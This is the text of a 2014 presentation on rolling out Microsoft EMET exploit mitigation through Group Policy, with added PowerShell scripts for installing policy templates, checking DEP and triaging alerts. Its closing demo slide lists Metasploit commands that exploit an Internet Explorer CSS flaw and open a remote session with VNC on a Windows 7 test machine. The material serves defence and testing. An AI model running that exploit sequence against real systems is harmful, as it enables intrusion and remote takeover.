Like what you hear? Tweet it using: #Sec360 5/13/2014
PRESENTATION Overview
Technical details
Testing
Rolling out in a Corporate Environment
Troubleshooting
Lessons Learned
Tips for Maximum security settings
Demo!
Trademarks owned by their respective owners
WHY RUN EMET? Do you have top notch anti-malware?
Are your PCs still being exploited? § No Anti-malware product is 100% effective § Zero-day exploits for IE / Flash / Adobe Reader / Java / etc…
Would you like to improve your odds?
SELLING EMET EMET Software:
Blocks “zero-day” malware exploits
Supplements existing anti-malware
Supported by Microsoft
Uses group policy
Minimal overhead
But wait, there’s more…
It’s FREE!!!
OK, WHAT IS EMET EMET: Enhanced Mitigation Experience Toolkit
A free software package from Microsoft § Available since 2009 / officially supported since 2011 § Current version is 4.1 (& 5.0 preview)
Blocks memory corruption /buffer overflow exploits § Example: it randomizes memory locations
Low overhead: Uses the Application Compatibility Framework, rather than running as a program § No need to recompile applications
Install on every workstation
WHY RUN EMET? Because Microsoft recommends it:
4/26/2014 - Microsoft KB2963983 IE Vulnerability – “Workarounds […] Deploy the Enhanced Mitigation Experience Toolkit”
3/24/2014 – Microsoft SRD2953095 Word Vulnerability – “our tests showed that EMET default configuration can block the exploits seen in the wild.”
3/11/2014 – Microsoft MS14-012 IE Vulnerability – “Does EMET help mitigate attacks that could attempt to exploit these vulnerabilities? Yes.”
…
7/28/2010 – Microsoft FF859539 IE Aurora Vulnerability – “EMET can help prevent successful exploitation on systems lacking the update.”
… and it blocks many more for Flash / Adobe Reader / Java / etc…
WHERE IT WORKS BEST Workstations typically get infected in two ways:
1. Workstation has vulnerable software § E.g. Unpatched/zero-day Adobe, Java, Office, Browser Plug-ins § Users visit automated exploit web site, or open bad email document
-> Install EMET
2. Users get tricked into running bad software § Payroll.exe, UPS-Tracking.zip, FakeAV.com
-> Train Users, EMET less effective
* In addition to other mitigations such as anti-malware
TECHNICAL: PROTECTION OVERVIEW Three Types of Protection:
1. System Wide § Programs can be coded to opt-in or opt-out
2. Per-Program § Enforces protection on specific programs
3. Per-Web-Site § Alerts users to fraudulent SSL/TLS certificates
TECHNICAL: 1. SYSTEM-WIDE 1. System Wide Protections:
DEP - Data Execution Prevention § Marks data (heap/stack) memory as non-executable § Requires support by the CPU (Intel=XD, AMD=NX)
SEHOP – Exception Handling § OS walks exception chain to validate before using it
ASLR – Address Randomization § Use different memory locations each boot
TECHNICAL: 1. SYSTEM-WIDE 1. System-Wide Protection Options: DEP / SEHOP/ASLR
Always On – All programs will use
Opt-Out – On except if program is written to opt-out
Opt-In – Off except if program is written to opt-in
Disabled – No programs will use
Opt-In vs. Opt-Out depends on risk tolerance/resources
Opt-In is the Microsoft recommendation § Less protection, but fewer compatibility issues
TECHNICAL: 2. PER-PROGRAM 2. Per-program Protection Options:
Memory Protections: § DEP / Bottom-Up ASLR / Mandatory ASLR / Heap Spray (blocks common locations) / Null Page
Return Oriented Programming (ROP): § Load Library checks (no UNC DLL calls) / Memory protection checks (disallow stack executable) / Caller Checks (critical functions only via “call” not “return”) / Stack Pivot (detect if stack pivoted) / Simulate execution flow (detect ROP gadgets)
Other: § SEHOP / EAF (Export Address Table Filtering - blocks API address lookup) / ASR (Attack Surface Reduction in v5.0, blocks specific plugins)
Note: Any protection applied to a browser protects all its plug-ins too
TECHNICAL: 3. CERTIFICATE TRUST 3. Per-web-site (v4): Certificate Trust Pinning § Deters an attacker from using a compromised certificate vendor to intercept traffic (DigiNotar/Google) in IE § E.g. https://www.facebook.com can only use DigiCert/Equifax/GeoTrust/Thawte/VeriSign certs § Config: MS / Yahoo / Skype / Twitter / Facebook § Might require maintenance with non-MS entries § Can specify expiration date, allow same country, etc.
Only warns users, doesn’t block
Not configurable by group policy
… CERTIFICATE TRUST
Example:
Certificate Trust Pinning https://www.facebook.com
Certificate Authority must be: DigiCert/Equifax/GeoTrust/ Thawte/VeriSign
E.g. but not DigiNotar
TESTING ON A PC
Install Microsoft .Net 4.0 (& KB 2790907 on Win 8/2012)
Download EMET from http://microsoft.com/emet
Install § It will ask if you want Recommended Settings § If no configuration is done, EMET doesn’t protect
…TESTING ON A PC DEMO
Install
Start GUI
Settings § System-Wide § Always On / App Opt-Out / App Opt-In / Disabled
§ Per-program § v3 / ROP / Mitigation Settings § Manually Adding
§ Web Certificate CA Pinning
…TESTING ON A PC Start up the GUI:
Start Menu -> EMET -> EMET GUI
Sample Test Settings:
DEP: Opt In
SEHOP: Opt In
ASLR: Opt In
Pinning: Enabled
…TESTING ON A PC Import per-Application & Cert Pinning Settings:
Import -> Popular § Popular has more than Recommended
Import -> CertTrust § Contains SSL/TLS certificate pinning rules for a few web sites
ROLLING OUT: PREP Download EMET (& .Net 4) § http://www.microsoft.com/emet
Extract Group Policy ADM* files § msiexec /a "EMET Setup.msi" /qb TARGETDIR="c:\temp" § (or copy from the EMET directory if EMET is already installed)
Install Group Policy ADM* files § Only needed on machines that will modify group policy § Copy EMET.admx and EMET.adml from c:\temp\group policy files to \Windows\PolicyDefinitions (admx) and \Windows\PolicyDefinitions\en-US (adml) § Note: ADM* files differ for each EMET version – use the current ones
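The prep steps above as one script, written for this page rather than taken from the presentation or from Microsoft: it runs the administrative install, finds the ADM* files, and places them in PolicyDefinitions. The default paths, the -PolicyDefinitions parameter (point it at the SYSVOL central store if you use one) and the PowerShell 4+ requirement for Get-FileHash are assumptions.

```powershell
# Added example (not from the presentation): unpack the EMET MSI with an
# administrative install and copy EMET.admx/EMET.adml into the local
# PolicyDefinitions folder, as the "Rolling out: prep" slide describes.
# File locations are assumptions; needs PowerShell 4+ for Get-FileHash.
param(
    [string]$Msi = 'C:\temp\EMET Setup.msi',
    [string]$Extract = 'C:\temp',
    [string]$PolicyDefinitions = "$env:SystemRoot\PolicyDefinitions"
)

# 1. Administrative install: extracts the package contents without installing EMET.
$msiArgs = @('/a', "`"$Msi`"", '/qb', "TARGETDIR=`"$Extract`"")
$proc = Start-Process -FilePath 'msiexec.exe' -ArgumentList $msiArgs -Wait -PassThru
if ($proc.ExitCode -ne 0) { throw "msiexec failed with exit code $($proc.ExitCode)" }

# 2. Find the ADM* files. The slide names the "group policy files" folder; searching
#    recursively keeps this working if another EMET version changes the layout.
$admx = Get-ChildItem -Path $Extract -Recurse -Filter 'EMET.admx' | Select-Object -First 1
$adml = Get-ChildItem -Path $Extract -Recurse -Filter 'EMET.adml' | Select-Object -First 1
if (-not $admx -or -not $adml) { throw "EMET.admx or EMET.adml not found under $Extract" }

# 3. ADM* files differ between EMET versions: warn before overwriting a different one.
$target = Join-Path $PolicyDefinitions 'EMET.admx'
if (Test-Path $target) {
    $oldHash = (Get-FileHash -Path $target).Hash
    $newHash = (Get-FileHash -Path $admx.FullName).Hash
    if ($oldHash -ne $newHash) { Write-Warning "Replacing a different EMET.admx at $target" }
}
$langDir = Join-Path $PolicyDefinitions 'en-US'
New-Item -ItemType Directory -Path $langDir -Force | Out-Null
Copy-Item -Path $admx.FullName -Destination $PolicyDefinitions -Force
Copy-Item -Path $adml.FullName -Destination $langDir -Force
Write-Output "Installed $($admx.Name) and $($adml.Name) into $PolicyDefinitions"
```

Run it elevated on the machine you edit group policy from; the EMET settings then appear under Computer Configuration in the Group Policy editor.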
ROLLING OUT: ACTIVE DIRECTORY
Note: Create a test OU container for each department / drag and drop PC
ROLLING OUT: SETTINGS
Note: Create a Group Policy Object, then link to each Test OU container
ROLLING OUT: SETTINGS
Note: IE, Popular, and Recommended Software are not similar
ROLLING OUT: SETTINGS
Include a shutdown script to apply the group policy: EMET_Conf --refresh
ROLLING OUT: SOFTWARE Roll out .Net 4.0 (& KB 2790907 on Win 8/2012)
Roll out EMET using Group Policy or other method
TROUBLESHOOTING EMET notification: Popup Window
OS Application log: § Office Plug-ins also produce an Application Error, search disk for the module
EMET V4 KNOWN ISSUES Group Policy settings don’t display properly in EMET GUI § Commands that will display them: EMET_Conf --list / reg query HKLM\Software\Policies\Microsoft\EMET\SysSettings
Certificate Trust Pinning limitations: § EMET Group Policy doesn’t contain those settings § Not available for the “Modern” IE app in Windows 8
Review the included EMET User’s Guide and the EMET web forum for additional caveats
LESSONS LEARNED 1. DEP breaks legacy applications § Roll out EMET to enterprise in phases § Set the system-wide DEP: Opt-in, not Always-on § E.g. breaks end-of-life versions of Crystal Reports
§ Can individually configure workstations to opt-out of DEP for a specific application if you set DEP to Opt-in § Computer Properties / Advanced /Performance / DEP
§ Can use the free Microsoft Application Compatibility Toolkit to create a “shim” to roll out for the application to opt-out of 32-bit DEP § Compatibility Fix setting: “Disable NX”
LESSONS LEARNED 2. Apply Group Policy settings before installing § Settings didn’t always apply afterwards § Can get the settings to apply by adding a Group Policy shutdown script to run “emet_conf --refresh”
3. Uninstalling EMET doesn’t revert system-wide changes (DEP) § Revert system-wide changes then uninstall § Tools - Windows 7: bcdedit § Possible BitLocker issue with DEP changes
4. IE developers may need EAF disabled for IE, WinZip may need update for Outlook plugin compatibility
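A check script for lessons 1 to 3 and for the group-policy display issue noted under known issues, added here and not part of the presentation: it reports the bcdedit DEP mode, the per-application DEP opt-outs, and the EMET policy registry values, so you can confirm Opt-In before rollout and confirm the mode was reverted before uninstalling. The AppCompatFlags\Layers lookup and the policy value names being read dynamically are assumptions; needs PowerShell 3+.

```powershell
# Added example (not from the presentation): report system-wide DEP mode, per-app
# DEP opt-outs and EMET Group Policy values. Registry layouts are assumptions.
function Get-DepMode {
    # bcdedit prints "nx  <OptIn|OptOut|AlwaysOn|AlwaysOff>" only when the value was set;
    # client editions of Windows default to OptIn when the entry is absent.
    $nx = bcdedit /enum '{current}' | Where-Object { $_ -match '^\s*nx\s+\S+' }
    if ($nx -and ("$nx" -match '^\s*nx\s+(\S+)')) { return $Matches[1] }
    return 'OptIn'
}

function Get-DepAppOptOuts {
    # Exclusions made on the DEP tab (Computer Properties / Advanced / Performance)
    # are stored as AppCompat "Layers" entries containing DisableNXShowUI (assumed).
    $key = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Layers'
    if (-not (Test-Path $key)) { return @() }
    (Get-ItemProperty -Path $key).PSObject.Properties |
        Where-Object { $_.Name -notlike 'PS*' -and "$($_.Value)" -match 'DisableNXShowUI' } |
        ForEach-Object { $_.Name }
}

function Get-EmetPolicy {
    # Group Policy values land here; the EMET v4 GUI may not show them, hence the
    # slides' advice to use "reg query" or "EMET_Conf --list" instead.
    $key = 'HKLM:\SOFTWARE\Policies\Microsoft\EMET\SysSettings'
    if (-not (Test-Path $key)) { return $null }
    (Get-ItemProperty -Path $key).PSObject.Properties |
        Where-Object { $_.Name -notlike 'PS*' } |
        ForEach-Object { [pscustomobject]@{ Setting = $_.Name; Value = $_.Value } }
}

$mode = Get-DepMode
"System-wide DEP (bcdedit nx): $mode"
if ($mode -ne 'OptIn') {
    Write-Warning "DEP is $mode; 32-bit legacy apps may break. Revert with: bcdedit /set {current} nx OptIn"
    # The slides note a possible BitLocker issue with DEP (boot configuration) changes.
    Write-Warning "Check BitLocker status before changing boot settings."
}
"Per-application DEP opt-outs:"; Get-DepAppOptOuts
"EMET system-wide policy values (from Group Policy):"
Get-EmetPolicy | Format-Table -AutoSize
```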
LESSONS LEARNED: THE GOOD POINTS 5. Office/IE issues only starting/closing application § A non-compatible add-in, one user a week issue § Users claim no impact on them § Yes, seriously – I asked twice
6. Fun to get notified if logging workstations centrally § Malware tends to give multiple EMET alerts
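An added example for point 6, not from the presentation: it reads EMET alerts from the Application log (or ForwardedEvents on a collector), groups them per host and process, and separates a single add-in that trips one mitigation at start-up from a host raising a burst of alerts. The "EMET detected <Mitigation> mitigation in <PROCESS>" message shape, the thresholds and the ForwardedEvents log name are assumptions; needs PowerShell 3+.

```powershell
# Added example (not from the presentation): triage EMET alerts by host and process.
param(
    [string]$LogName = 'Application',   # 'ForwardedEvents' on a central collector
    [int]$Hours = 24,
    [int]$Threshold = 3,                # alerts per host+process treated as a burst
    [int]$WindowMinutes = 10
)

# Assumed message shape: "EMET detected <Mitigation> mitigation in <PROCESS.EXE>".
$pattern = 'EMET detected (?<Mitigation>\S+) mitigation(?: in (?<Process>\S+))?'

$events = Get-WinEvent -FilterHashtable @{
    LogName = $LogName; ProviderName = 'EMET'; StartTime = (Get-Date).AddHours(-$Hours)
} -ErrorAction SilentlyContinue

$alerts = foreach ($e in $events) {
    if ($e.Message -match $pattern) {
        [pscustomobject]@{
            Time       = $e.TimeCreated
            Host       = $e.MachineName
            Process    = $Matches['Process']
            Mitigation = $Matches['Mitigation']
        }
    }
}

"EMET mitigation alerts in the last $Hours h: $(@($alerts).Count)"
# One app repeatedly failing one mitigation is usually an incompatible add-in;
# several alerts (often different mitigations) within minutes on one host is
# the pattern the slides associate with malware and deserves a look.
$alerts | Group-Object Host, Process | ForEach-Object {
    $sorted = @($_.Group | Sort-Object Time)
    $first = $sorted[0].Time; $last = $sorted[-1].Time
    $kinds = ($sorted | Select-Object -ExpandProperty Mitigation -Unique) -join ','
    $burst = ($sorted.Count -ge $Threshold) -and (($last - $first).TotalMinutes -le $WindowMinutes)
    [pscustomobject]@{
        Host        = $_.Values[0]
        Process     = $_.Values[1]
        Alerts      = $sorted.Count
        Mitigations = $kinds
        FirstSeen   = $first
        LastSeen    = $last
        Verdict     = $(if ($burst) { 'INVESTIGATE: burst of alerts' } else { 'review for compatibility' })
    }
} | Sort-Object Alerts -Descending | Format-Table -AutoSize
```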
TIPS FOR EXTRA SECURITY Microsoft’s recommendation for Windows 7: § “Opt-in” for System-wide settings § “Recommended Software” (IE/Office/Adobe/Java) for Per-application settings
A better recommendation: § Add “Popular Software” for Per-application settings § Adds other applications such as Firefox and Chrome web browsers § Big bang for the buck with minimal issues – DO IT!
Maximum settings: Not a recommendation with legacy software § “Opt-out” for System-wide settings (“Always On” won’t allow fixes to work) § Breaks DEP with 32-bit legacy applications – Possibly not worth extra effort
§ Create and deploy “shims” to fix the applications
REFERENCES Microsoft EMET Homepage § www.microsoft.com/emet § Download link has the User Guide
EMET Support Forum § social.technet.microsoft.com/Forums/security/en-US/home?forum=emet
Microsoft Videos § Tech: technet.microsoft.com/en-us/security/ff859539.aspx § Non-Tech: http://aka.ms/pjyesw § EMET 4.1/5.0 TP: http://technet.microsoft.com/en-us/security/jj653751
EMET PROTECTION DEMO DEMO
Testing EMET using Metasploit w/ Armitage GUI
§ Systems: Windows 7; Metasploit / Armitage on Kali 1.0 (~BackTrack)
§ Setup: Msfupdate, Kali/System/Metasploit/Start, Kali/Exploit/Net/Armitage
§ Exploit (Kali): use exploit/windows/browser/ms11_003_ie_css_import / set SRVPORT=80 / set URIPATH=funny / exploit -j
§ (Win7) Browse to http://server/funny
§ (Kali/Console) sessions / session -i 1 / run vnc
QUESTIONS? Contact:
Chris Covington, CISSP
ccovington@logis.org